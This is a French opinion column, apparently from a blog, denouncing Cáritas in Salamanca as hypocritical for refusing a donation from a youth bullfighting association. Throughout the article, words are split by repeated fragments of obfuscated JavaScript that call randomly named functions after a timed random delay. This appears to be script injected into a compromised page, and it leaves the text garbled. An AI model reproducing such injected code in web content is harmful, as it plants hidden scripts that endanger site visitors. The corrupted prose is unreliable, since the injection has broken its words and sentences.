HYPOCRISIE DIOCESAINE

Nous vivons dans un monde de contradictions et d’inconséquences et celles-ci nous tombent dessus au quotidien dans tous les domaines sociaux. Comme exemples les plus récents, nous avons les Etats-Unis, qui s’arrogent comme la capitale de la liberté et de la tolérance, ont choisi pour président un énergumène xénophobe et raciste comme Donald Trump, ou un pays comme le nôtre où des parents d’élèves fomentent une grève contre les devoirs à la maison que les professeurs demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andent à leurs enfants ou celle que les propres élèves ont faite contre des examens de fin d’étude dont l’objet n’est autre que d’uniformiser l’enseignement mettant en évidence l’inégalité des niveaux d’exigence qui existe depuis des années dans différentes centres scolaires et qu’il serait souhaitable d’éradiquer.

Cela nous amène à une autre affaire encore plus scandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andaleuse : une institution caritative qui décide de refuser un don pour ses paroissiens qui en ont le plus besoin car la provenance du don ne lui semble pas convenable.

C’est arrivé mercredi dernier quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and les (ir)responsables de Cáritas de Samanque ont décidé de refuser le don de l’Asociación Juventud Taurina de cette ville uniquement pour cette raison : c’est une entité taurine. Devant le scandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andale que leur position a provoqué sur les médiaux sociaux, ils ont finalement répondu qu’ils n’avaient refusé aucun don mais que tout simplement ils ne s’étaient pas associés à la campagne de vente de stylos promue par des jeunesses taurines et dont 50% des bénéfices allaient être destinés aux personnes en difficulté. Une affirmation en contradiction à ce qu’ils avaient affirmé au préalable où il était dit textuellement que « nous refusons votre donation car elle peut heurter la sensibilité de nos donateurs car le monde de la tauromachie est aujourd’hui un collectif très critiqué ».

Voilà là reflété leur manque d’honnêteté et de charité. Je suis sûr qu’ils ne demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andent pas les autres fois si l’argent qui leur est versé provient de la drogue, du vol, de l’escroquerie, de la traite des blanches ou de la corruption, cependant, ils deviennent très stricts si l’argent qui leur est destiné provient du monde de la tauromachie comme cela est aussi arrive en début d’année avec la somme qu’ils devaient recevoir –je me réfère au don pour Cáritas de Valence- du festival de Requena, de l’argent qui fut finalement destiné à nos plus anciens. Désemparés, cette fois-ci l’argent sera versé pour les malades du cancer. Comme je l’ai déjà dit, je préfère un monde juste qu’un monde charité, car la charité est liée inévitablement à l’indigence et la précarité ; cependant, dans la société dans laquelle nous vivons, il est toujours bon de savoir qu’il y a des gens miséricordieux qui s’occupent et se préoccupent de permettre à ceux dans le besoin d’avoir un minimum. Ainsi me semble t-il un outrage à cette bonhomie afficher cette « délicatesse » avec nos amies les bêtes au point de refuser un don destiné à soulager la misère des plus démunis qui, bien entendu, ne sont ni la responsable de Cáritas de Salamanque, Belén Santamaría, ni le reste des personnes qui se sont permis de le dédaigner.

Avec une aussi détestable décision le masque de leur prétendue bonté si vantée et de leur vertu tombe et se transforme en hypocrisie, je me pose pas mal de questions : quel sorte d’égoïsme est aux manettes dans ce qui devrait être une maison de miséricorde ? De quel droit on prive les plus nécessiteux de donations qui contribueraient à leur bien-être ? La compassion pour le taureau dépasse t’elle celle pour l’homme ?… Se pourrait-il que Cáritas reçoive de l’argent des groupes de pression anti-taurins ou des grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes corporations de Hollandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande, Suisse, Etats-Unis et Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande Bretagne qui financent les attaques contre la tauromachie ? Cáritas serait-elle tombée dans le chantage anti-taurin se vendant au plus offrant ? S’il en est ainsi, là aussi elle se trompe car même si les taurophobes leur donnent plein d’argent ils ne pourront jamais être à la hauteur des contributions de la tauromachie tout au long de son histoire, Cáritas incluse. Même si ça me rend malade de voir privilégier l’amour des bêtes à leur hypothétique amour chrétien pour leurs semblables qui apparemment devrait guider les diocésains de Cáritas, ce qui me préoccupe le plus, ce qui m’inquiète dans leur ferme opposition à la tauromachie c’est que pendant toute son histoire l’Eglise a toujours été pour survivre du côté des gagnants, changeant ses principes suivant comment tournait le vent et même si cela l’obligeait à se positionner en faveur du nazisme ou du franquisme. Autrement dit, ils doivent voir l’avenir de la tauromachie assez noir pour avoir adopté cette posture. Ou tout simplement ils sont bêtes, ce qui peut aussi arriver.

Les commentaires sont fermés.